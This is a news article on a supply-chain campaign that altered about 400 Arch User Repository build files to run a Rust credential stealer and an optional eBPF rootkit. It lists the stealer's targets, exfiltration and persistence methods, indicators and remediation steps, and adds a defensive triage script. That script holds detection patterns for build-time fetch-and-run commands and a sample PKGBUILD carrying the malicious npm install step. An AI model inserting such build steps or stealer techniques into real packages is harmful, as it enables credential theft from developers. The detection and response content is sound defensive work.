More than 400 packages in the Arch User Repository were quietly altered this week so that building them would run a Rust credential stealer — and, if it landed with root privileges, could load an optional eBPF rootkit designed to hide the infection.
How attackers abused the AUR trust model
Attackers adopted orphaned AUR packages, kept their names and histories intact, and edited the build files (PKGBUILD or .install) so that building the package ran malicious commands. No software flaw was exploited and none of Arch's official systems were breached; the campaign changed the recipe that builds community packages. Sonatype named the campaign "Atomic Arch", and community trackers found that the targets were abandoned projects whose orphaned status left them open for any registered AUR user to adopt.
In many cases the malicious commits were dressed up to look legitimate: the attackers set the author fields in the git commit metadata to those of a long-standing maintainer, so the changes appeared under that person's name. Git does not authenticate those fields, and an Arch Linux Trusted User later confirmed that the maintainer's account had not been compromised. The official Arch repositories were not affected; this campaign targeted the separate, community-run AUR.
The Rust credential stealer and the optional eBPF rootkit
Independent researcher Whanos reverse-engineered the injected payload, a Rust binary named deps bundled inside an npm package. The stealer collects developer-oriented secrets: cookies, tokens and local storage from Chromium-based browsers; session data from Electron apps including Slack, Discord and Microsoft Teams; GitHub, npm and HashiCorp Vault tokens; OpenAI/ChatGPT bearer material and account metadata; SSH keys, known_hosts and shell histories; Docker and Podman credentials; and VPN profiles.
Stolen data is exfiltrated over HTTP to temp.sh, while command-and-control traffic is routed through a Tor onion service via a local loopback proxy. For persistence the binary installs a systemd service with Restart=always. When it runs as root it copies itself under /var/lib/ and writes a unit under /etc/systemd/system/; as a normal user it uses the home directory and a per-user unit under ~/.config/systemd/user/.
Early analyses overstated the role of the eBPF component: it is optional and only activates when the binary has root and the right capabilities — it is not used to escalate privileges. When loaded, the BPF code hides the malware’s processes, process names and socket inodes using pinned maps named hidden_pids, hidden_names and hidden_inodes, and prevents debugger attachments. Analysts also flagged a second staged file tied to monero-wallet-gui as a possible, unanalyzed cryptominer.
Scale, indicators, and a second wave
Sonatype’s first write-up identified more than 20 hijacked packages. Community trackers and a grep of the AUR git mirror quickly expanded that to roughly 408 packages, and consolidated lists continued to grow. Confirmed examples reported to the Arch mailing list include the alvr and premake-git packages.
The injected build step commonly ran npm install atomic-lockfile, pulling atomic-lockfile@1.4.2 alongside otherwise legitimate dependencies; that package carried a preinstall lifecycle script, which npm runs automatically during installation, and the script executed the bundled deps ELF. The atomic-lockfile package showed only 134 weekly downloads on Socket before it was removed from the registry, indicating that the primary exposure vector was AUR builds rather than direct npm installs.
A second wave used bun install js-digest, pushed from accounts linked by community trackers to the same npm publisher as atomic-lockfile; that payload is a different ELF, also flagged as malicious. The affected-package lists remain incomplete; Sonatype tracks the activity as Sonatype-2026-003775 with a CVSS score of 8.7, and no CVE has been assigned.
The main payload’s SHA-256 is 6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b; the full indicator set and the onion C2 host are published in the ioctl.fail analysis.
Immediate remediation and detection steps
- Check any AUR package installed or updated on or after June 11 against community-compiled affected-package lists and detection scripts. Grep recent build history and caches for npm install atomic-lockfile, bun install js-digest, and the payload path src/hooks/deps.
- If a flagged package ran, treat the host as credential-compromised. Rotate browser sessions, SSH keys, GitHub and npm tokens, Slack/Teams/Discord sessions, Vault tokens, Docker and Podman credentials, and any cloud keys the stealer could access.
- Hunt for persistence: look for unexpected systemd services (system units and ~/.config/systemd/user/), unexpected files under /var/lib/, and pinned BPF maps under /sys/fs/bpf named hidden_pids, hidden_names and hidden_inodes. Review outbound connections for Tor and uploads to services such as temp.sh.
- If the package ran as root, assume the eBPF rootkit may be present and reinstall the system from trusted media; a package manager cannot prove a system is clean after a rootkit-capable payload executed.
- Going forward, read PKGBUILD and .install hooks before building AUR packages, especially recently adopted or long-dormant projects that suddenly become active. If you do not understand the build instructions, do not install the package.
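The steps above can be driven from one small triage script. The following is an added example written for this article; it is not the community detection script, nor code from Sonatype, ioctl.fail or the Arch project. It reuses only the indicator strings, pinned-map names and SHA-256 quoted above; the cache paths it suggests, the "suspicious unit" heuristic (a forever-restarting service launched from /var/lib, /home or /root) and the pre-build review pattern for registry installers and curl-pipe-to-shell lines are this example's own assumptions, and the sample PKGBUILD and unit files it creates are constructed for the demo.

```bash
#!/bin/sh
# Added example (not from the article, Sonatype, ioctl.fail or Arch): offline
# triage helpers for the remediation steps above. Indicator strings, map names
# and the hash come from the reporting; the unit-file and pre-build review
# heuristics are this example's own assumptions.
set -u

# Indicator strings from the reported PKGBUILD/.install injections.
IOC_PATTERN='npm install atomic-lockfile|bun install js-digest|src/hooks/deps|atomic-lockfile@1\.4\.2'
# Published SHA-256 of the "deps" stealer binary.
IOC_SHA256='6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b'
# Heuristic (assumption): registry installers and curl/wget piped to a shell
# have no business in a build recipe.
FETCH_PATTERN='(npm|bun|pnpm|yarn|pip3?) +(install|i|add) |(curl|wget) .*\| *(ba)?sh'

# 1. Scan AUR checkouts and helper caches (e.g. ~/.cache/yay, ~/.cache/paru)
#    for the indicator strings. Prints matching files; exit 0 = hits, 1 = clean.
aur_scan_dir() {
    hits=$(find "$1" -type f ! -path '*/.git/*' -exec grep -lE -e "$IOC_PATTERN" {} + 2>/dev/null || true)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# 2. Look for the rootkit's pinned maps on the BPF filesystem. Traversing
#    /sys/fs/bpf needs root; an alternate root can be passed for testing.
check_bpf_pins() {
    bpffs=${1:-/sys/fs/bpf}
    hits=$(find "$bpffs" \( -name hidden_pids -o -name hidden_names -o -name hidden_inodes \) 2>/dev/null || true)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# 3. Heuristic persistence check (assumption): a unit with Restart=always whose
#    ExecStart lives under /var/lib, /home or /root, the two locations the
#    stealer installs to. Pass /etc/systemd/system and ~/.config/systemd/user.
check_units() {
    found=1
    for dir in "$@"; do
        for unit in "$dir"/*.service; do
            [ -f "$unit" ] || continue
            if grep -q '^Restart=always' "$unit" &&
               grep -Eq '^ExecStart=[-@+]*(/var/lib/|/home/|/root/)' "$unit"; then
                printf 'suspicious unit: %s\n' "$unit"
                found=0
            fi
        done
    done
    return $found
}

# 4. Compare a file against the published hash of the deps binary.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi | cut -d' ' -f1
}
check_hash() {
    [ "$(sha256_of "$1")" = "$IOC_SHA256" ]
}

# 5. Pre-build review aid: lines a new PKGBUILD revision adds that fetch and run
#    code at build time. Compare the revision you last built against the one
#    you are about to build (both revisions are available from the AUR git log).
review_pkgbuild_change() {
    added=$(diff "$1" "$2" | grep -E "^> .*($FETCH_PATTERN)" || true)
    [ -n "$added" ] || return 1
    printf '%s\n' "$added"
}

# Demo on constructed sample files (not real package contents) so it runs offline.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/aur/hijacked" "$tmp/aur/clean" "$tmp/units"
    printf 'pkgname=clean-git\nbuild() {\n  make\n}\n' > "$tmp/aur/clean/PKGBUILD"
    printf 'pkgname=hijacked-git\nbuild() {\n  npm install atomic-lockfile\n  make\n}\n' > "$tmp/aur/hijacked/PKGBUILD"
    printf '[Service]\nExecStart=/var/lib/deps\nRestart=always\n' > "$tmp/units/deps.service"
    aur_scan_dir "$tmp/aur" && echo '-> indicator strings found'
    check_units "$tmp/units" && echo '-> persistence heuristic matched'
    review_pkgbuild_change "$tmp/aur/clean/PKGBUILD" "$tmp/aur/hijacked/PKGBUILD" && echo '-> added build-time fetch'
    check_bpf_pins || echo '-> no pinned hidden_* maps visible (run as root to be sure)'
    rm -rf "$tmp"
}
demo
```

For a real hunt, point aur_scan_dir at the AUR helper cache and any checkout directories, check_units at both the system and per-user unit directories, and run check_bpf_pins as root; a hit from any function means the host should be handled as credential-compromised per the steps above, and a clean result from this script is not proof of a clean system once a rootkit-capable payload has run as root.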
What this means for Arch maintainers, technologists, and end users
Arch maintainers are resetting malicious commits, banning the offending accounts and asking users to report suspect packages on the mailing list thread. Technologists and security teams will need to hunt systems for both the stealer’s indicators and persistence mechanisms and treat affected hosts as credential-compromised. End users — particularly developers and build-system operators — should scrutinize any AUR packages updated on or after June 11 and avoid building recently adopted packages without inspecting PKGBUILD and install hooks.
The campaign succeeded not by cracking code but by hijacking trust: attackers inherited trusted names and histories and changed the build instructions beneath them. The affected list is still incomplete, and the community response now hinges on cataloging every altered package and on operators treating build-time execution as a significant supply-chain risk. Read the original advisory and indicator set here: https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html
